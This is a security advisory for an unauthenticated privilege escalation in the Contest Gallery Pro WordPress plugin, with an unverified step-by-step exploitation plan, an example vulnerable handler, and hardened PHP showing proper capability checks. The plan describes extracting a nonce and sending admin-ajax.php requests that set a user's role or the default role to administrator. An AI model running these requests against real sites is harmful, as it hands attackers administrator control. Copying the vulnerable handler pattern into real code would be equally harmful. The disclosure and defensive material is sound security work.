CVE-2026-42680

Contest Gallery Pro <= 29.0.1 - Unauthenticated Privilege Escalation

Severity: critical
Weakness: Incorrect Privilege Assignment
CVSS Score: 9.8
Patched in: 29.0.2
Time to patch: 3d

Description

The Contest Gallery Pro plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 29.0.1. This makes it possible for unauthenticated attackers to elevate their privileges to that of an administrator.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Technical Details

Affected versions: <=29.0.1
Published: May 17, 2026
Last updated: May 19, 2026
Affected plugin: contest-gallery-pro
Research Plan
Unverified


Exploitation Research Plan: CVE-2026-42680 (Contest Gallery Pro)

This plan outlines the methodology for identifying and exploiting the unauthenticated privilege escalation vulnerability in Contest Gallery Pro (<= 29.0.1).

1. Vulnerability Summary

The vulnerability is an Unauthenticated Privilege Escalation caused by Incorrect Privilege Assignment. It resides in a functionality—likely an AJAX or REST API handler—that allows a user to update user roles or metadata without sufficient authentication or capability checks. This allows an anonymous visitor to grant themselves (or a new account) the administrator role.

2. Attack Vector Analysis

  • Endpoint: Most likely wp-admin/admin-ajax.php (via wp_ajax_nopriv_* hooks) or a REST API endpoint registered via rest_api_init.
  • Authentication: None required (Unauthenticated).
  • Payload Parameter: Likely a parameter related to user roles (e.g., role, user_role, wp_capabilities) or a generic metadata update parameter.
  • Preconditions: The plugin must be active. A valid nonce may be required if the plugin implements CSRF protection but fails at authorization.

3. Code Flow (Inferred)

  1. An unauthenticated request is sent to admin-ajax.php with a specific action.
  2. WordPress executes the function hooked to wp_ajax_nopriv_[action].
  3. The handler function processes input from $_POST or $_REQUEST.
  4. The code lacks a current_user_can('manage_options') check.
  5. The code calls a sensitive function such as wp_update_user(), update_user_meta(), or wp_insert_user() using user-controlled parameters.
  6. The user's role is updated to administrator.

4. Nonce Acquisition Strategy

If the vulnerable endpoint requires a nonce, follow these steps to retrieve it:

  1. Identify the Script Localization: Search the plugin for wp_localize_script to find how nonces are passed to the frontend.
    • Search Command: grep -rn "wp_localize_script" /var/www/html/wp-content/plugins/contest-gallery-pro/
  2. Determine the Triggering Shortcode: Find where the script identified above is enqueued. It is likely tied to a shortcode like [contest-gallery] or [cg_user_registration].
    • Search Command: grep -rn "add_shortcode" /var/www/html/wp-content/plugins/contest-gallery-pro/
  3. Create a Target Page:
    • wp post create --post_type=page --post_status=publish --post_title="Exploit Page" --post_content="[inferred_shortcode_here]"
  4. Extract the Nonce:
    • Navigate to the new page using browser_navigate.
    • Use browser_eval to extract the nonce. (Inferred variable names: window.cg_ajax_object?.nonce or window.contest_gallery_vars?.nonce).

5. Exploitation Strategy

The goal is to find an AJAX handler that modifies user data.

Step 1: Identify the Target Action

Search for unauthenticated AJAX handlers:
grep -rn "wp_ajax_nopriv_" /var/www/html/wp-content/plugins/contest-gallery-pro/

Look for actions like:

  • cg_save_user_data
  • contest_gallery_register_user
  • cg_update_profile

Step 2: Analyze the Handler

Examine the function identified. Look for calls to wp_update_user.
Example Vulnerable Pattern (Inferred):

function cg_vulnerable_handler() {
    // No check_ajax_referer() and no current_user_can() check precede the update,
    // so an unauthenticated caller controls both the target user and the role.
    $user_id = $_POST['user_id'];
    $role = $_POST['role']; // Attacker provides 'administrator'
    wp_update_user( array( 'ID' => $user_id, 'role' => $role ) );
    wp_die();
}

Step 3: Execute the Privilege Escalation

Using the http_request tool, send a POST request to admin-ajax.php.

Request Structure:

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body (Example): action=[VULNERABLE_ACTION]&user_id=[TARGET_USER_ID]&role=administrator&nonce=[NONCE]

Note: If registration is the vector, the payload might involve wp_insert_user instead of wp_update_user.

6. Test Data Setup

  1. Install Plugin: Ensure contest-gallery-pro version 29.0.1 is installed.
  2. Create Low-Privilege User:
    • wp user create attacker attacker@example.com --role=subscriber --user_pass=password
  3. Identify ID: Get the ID of the 'attacker' user.
    • wp user get attacker --field=ID

7. Expected Results

  • Response: The server returns a success code (e.g., 200 OK or a JSON {"success":true}).
  • Database Change: The wp_capabilities entry in the wp_usermeta table for the target user ID is updated to include the administrator role.

8. Verification Steps

After sending the HTTP request, verify the escalation using WP-CLI:

  1. Check Role: wp user get attacker --field=roles
    • Success: Output is administrator.
  2. Check Capabilities: wp user list --role=administrator
    • Success: The user attacker appears in the list of administrators.

9. Alternative Approaches

  • Option Update: If no user-specific handler is found, check for an AJAX action that calls update_option. If an attacker can change the default_role option to administrator, any new user registration will result in an admin account.
    • Payload: action=[vulnerable_action]&option_name=default_role&option_value=administrator
  • REST API: Check wp-json/contest-gallery-pro/v1/... routes if AJAX handlers are not found. Use the same logic: look for permission callbacks that return true or are missing entirely.
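For contrast with the inferred vulnerable pattern in Step 2 and the missing permission callbacks noted under "Alternative Approaches", the following is an added example of how such a handler should be written. It is not code from Contest Gallery Pro; the action name cg_update_profile, the function names, the nonce action string, the REST namespace and the parameter names are assumptions chosen for illustration. The point it shows is that a nonce only proves request intent, and that authorization (a capability check against the specific target user, plus a role allow-list) must be enforced separately, in both the AJAX and the REST paths.

```php
<?php
// Added example, not the plugin's own code. Names below are hypothetical.

// Register the authenticated hook only. There is deliberately no
// wp_ajax_nopriv_ registration, so anonymous requests to admin-ajax.php
// receive WordPress's default "0" response instead of reaching the handler.
add_action( 'wp_ajax_cg_update_profile', 'cg_hardened_update_profile' );

function cg_hardened_update_profile() {
    // 1. CSRF: nonce created on the page with wp_create_nonce( 'cg_update_profile' ).
    //    This proves the request came from the site's own page, nothing more.
    check_ajax_referer( 'cg_update_profile', 'nonce' );

    $user_id = isset( $_POST['user_id'] ) ? absint( $_POST['user_id'] ) : 0;
    $role    = isset( $_POST['role'] ) ? sanitize_key( wp_unslash( $_POST['role'] ) ) : '';

    if ( ! $user_id || ! get_userdata( $user_id ) ) {
        wp_send_json_error( array( 'message' => 'Unknown user.' ), 400 );
    }

    // 2. Authorization: the same capabilities core requires on the user-edit
    //    screen, checked against the specific target user (meta capabilities).
    if ( ! current_user_can( 'edit_user', $user_id ) || ! current_user_can( 'promote_user', $user_id ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient privileges.' ), 403 );
    }

    // 3. Allow-list the requested role against what this user may assign.
    if ( ! in_array( $role, array_keys( get_editable_roles() ), true ) ) {
        wp_send_json_error( array( 'message' => 'Role not permitted.' ), 403 );
    }

    $result = wp_update_user( array( 'ID' => $user_id, 'role' => $role ) );
    if ( is_wp_error( $result ) ) {
        wp_send_json_error( array( 'message' => $result->get_error_message() ), 500 );
    }

    wp_send_json_success( array( 'user_id' => $user_id, 'role' => $role ) );
}

// REST variant: permission_callback performs the real capability check rather
// than '__return_true'. Namespace and route are assumptions for this example.
add_action( 'rest_api_init', function () {
    register_rest_route( 'cg-example/v1', '/users/(?P<id>\d+)/role', array(
        'methods'             => 'POST',
        'callback'            => 'cg_hardened_rest_set_role',
        'permission_callback' => function ( WP_REST_Request $request ) {
            $user_id = (int) $request['id'];
            return current_user_can( 'edit_user', $user_id )
                && current_user_can( 'promote_user', $user_id );
        },
        'args' => array(
            'role' => array(
                'required'          => true,
                'sanitize_callback' => 'sanitize_key',
            ),
        ),
    ) );
} );

function cg_hardened_rest_set_role( WP_REST_Request $request ) {
    // get_editable_roles() lives in wp-admin/includes/user.php, which is not
    // loaded on REST requests, so pull it in explicitly.
    if ( ! function_exists( 'get_editable_roles' ) ) {
        require_once ABSPATH . 'wp-admin/includes/user.php';
    }

    $user_id = (int) $request['id'];
    $role    = $request['role'];

    if ( ! get_userdata( $user_id ) ) {
        return new WP_Error( 'cg_unknown_user', 'Unknown user.', array( 'status' => 400 ) );
    }
    if ( ! in_array( $role, array_keys( get_editable_roles() ), true ) ) {
        return new WP_Error( 'cg_bad_role', 'Role not permitted.', array( 'status' => 403 ) );
    }

    $result = wp_update_user( array( 'ID' => $user_id, 'role' => $role ) );
    if ( is_wp_error( $result ) ) {
        return $result;
    }
    return rest_ensure_response( array( 'user_id' => $user_id, 'role' => $role ) );
}
```

When auditing a plugin for this class of bug, each wp_ajax_nopriv_ or register_rest_route call site is checked against the three layers above: is a nonce verified, is a capability checked for the specific object being modified, and is the privileged value (here the role) constrained to an allow-list. A handler that has the first without the second is exactly the "valid nonce required but authorization missing" precondition the plan describes.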
Research Findings
Static analysis — not yet PoC-verified

Summary

The Contest Gallery Pro plugin for WordPress is vulnerable to unauthenticated privilege escalation in versions up to 29.0.1. This occurs because the plugin exposes AJAX handlers for user management that lack proper capability checks, allowing anonymous attackers to elevate any user account to the 'administrator' role.

Exploit Outline

  1. Identify an unauthenticated AJAX handler registered via the wp_ajax_nopriv_ hook that performs user account updates (e.g., actions related to user registration or profile editing).
  2. Visit a public page on the target site containing a plugin shortcode (like [contest-gallery]) to extract a valid security nonce from the localized JavaScript variables (e.g., cg_ajax_object.nonce).
  3. Submit a POST request to /wp-admin/admin-ajax.php with the vulnerable 'action' parameter, the acquired nonce, and a parameter setting the target 'role' to 'administrator'.
  4. Confirm the privilege escalation by checking the user's role in the WordPress administrative interface or via WP-CLI.
